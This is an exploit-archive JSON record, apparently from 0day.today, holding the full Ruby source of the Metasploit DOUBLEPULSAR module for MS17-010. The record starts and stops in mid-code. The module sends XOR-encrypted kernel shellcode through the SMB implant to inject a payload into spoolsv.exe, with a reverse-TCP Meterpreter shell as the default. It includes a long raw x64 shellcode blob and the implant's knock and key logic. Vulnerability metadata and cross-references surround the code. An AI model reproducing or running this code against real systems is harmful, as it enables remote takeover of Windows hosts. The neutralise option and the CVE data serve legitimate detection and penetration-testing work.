DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-17] #"}, "lastseen": "2021-10-16T22:17:06", "differentElements": ["sourceData"], "edition": 47}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f59c11fc510871a8e5ced50102f2a1a6", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-18T18:18:17", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T18:18:17", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-18T18:18:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n 